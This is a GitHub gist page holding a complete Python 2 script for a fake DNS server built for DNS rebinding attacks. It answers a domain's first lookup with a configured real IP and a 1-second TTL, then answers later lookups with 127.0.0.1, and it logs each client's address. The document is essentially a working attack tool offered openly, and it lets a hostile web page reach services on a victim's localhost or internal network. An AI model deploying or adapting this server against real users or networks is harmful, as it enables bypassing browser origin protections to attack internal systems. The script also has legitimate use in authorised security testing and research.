Skip to content

Instantly share code, notes, and snippets.

@xkon
Created February 23, 2017 02:18
Show Gist options
  • Save xkon/20b8e213a82776ed40fa4bcd45045b24 to your computer and use it in GitHub Desktop.
Save xkon/20b8e213a82776ed40fa4bcd45045b24 to your computer and use it in GitHub Desktop.
a simple fake DNS server for DNS rebinding Attack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : xk0n
# @Date : 2017-00-00
# from __future__ import print_function,division,unicode_literals
import SocketServer
import struct
import datetime
import logging
import socket
import config
'''
# config.py
real_ip = '1.2.3.4'
short_ttl = 1
local_ip = '127.0.0.1'
long_ttl = 60
'''
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s] %(message)s',
datefmt='%y/%m/%d %H:%M:%S',
filename='/tmp/fakedns.log',
filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('[%(asctime)s] %(message)s',datefmt='%y/%m/%d %H:%M:%S')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
# 已经查询过了的domain names
dn = []
class DNSFrame:
'''
DNS frame,
Must initialized by a DNS query frame data
'''
def __init__(self, data):
self.id, self.flags, self.quests, self.answers, self.author, self.addition = struct.unpack('>HHHHHH', data[0:12])
self.query = DNSQuery(data[12:])
def getname(self):
return self.query.name
def set(self, ip, ttl):
self.answer = DNSAnswer(ip, ttl)
self.answers = 1
self.flags = 33152
def getbytes(self):
res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
res = res + self.query.getbytes()
if self.answers != 0:
res = res + self.answer.getbytes()
return res
class DNSQuery:
'''
DNS Query Object
'''
def __init__(self, data):
i = 1
self.name = ''
while True:
d = ord(data[i])
if d == 0:
break;
if d < 32:
self.name = self.name + '.'
else:
self.name = self.name + chr(d)
i = i + 1
self.querybytes = data[0:i + 1]
(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
self.len = i + 5
def getbytes(self):
return self.querybytes + struct.pack('>HH', self.type, self.classify)
class DNSAnswer:
'''
DNS Answer RRS
this class is also can be use as Authority RRS or Additional RRS
'''
def __init__(self, ip, ttl):
self.name = 0xc00c # Pointer to domain name
self.type = 1 # Type A
self.classify = 1 # Class IN
self.timetolive = ttl # TTL
self.datalength = 4 # Data length
self.ip = ip # 4 bytes of IP
def getbytes(self):
res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
s = self.ip.split('.')
res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
return res
class DNSQueryHandler(SocketServer.BaseRequestHandler):
'''
A UDPHandler to handle DNS query
'''
def handle(self):
'''
To handle a UDP data request(DNS query is by UDP)
'''
data = self.request[0].strip()
dns = DNSFrame(data)
_dn = dns.getname()
# 不是第一次请求
if _dn in dn:
ip = config.local_ip
ttl = config.long_ttl
else:
ip, ttl = config.real_ip,config.short_ttl
dn.append(_dn)
logging.info('{ip} - query for {hostname}'.format(ip=self.client_address[0],hostname=_dn))
sock = self.request[1]
if(dns.query.type==1):
# If this is query a A record, then response it
dns.set(ip,ttl)
sock.sendto(dns.getbytes(), self.client_address)
logging.info('{ip} - response with {response} ttl:{ttl}'.format(ip=self.client_address[0],response=ip,ttl=ttl))
else:
# else, ignore it, because can't handle it
sock.sendto(data, self.client_address)
class DNSServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
'''
DNS Server,
It only support A record query
'''
def __init__(self, server_address=('0.0.0.0', 53), DNSQueryHandlerClass=DNSQueryHandler):
'''
Init a DNS Server,
DNSQueryHandlerClass must be a subclass of DNSQueryHandler
'''
SocketServer.UDPServer.__init__(self, server_address, DNSQueryHandlerClass)
# Now, test it
if __name__ == "__main__":
import sys
host, port = '0.0.0.0', len(sys.argv) == 2 and int(sys.argv[1]) or 53
serv = DNSServer((host, port), )
logging.info('DNS Server running at %s:%s'%(host, port))
serv.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment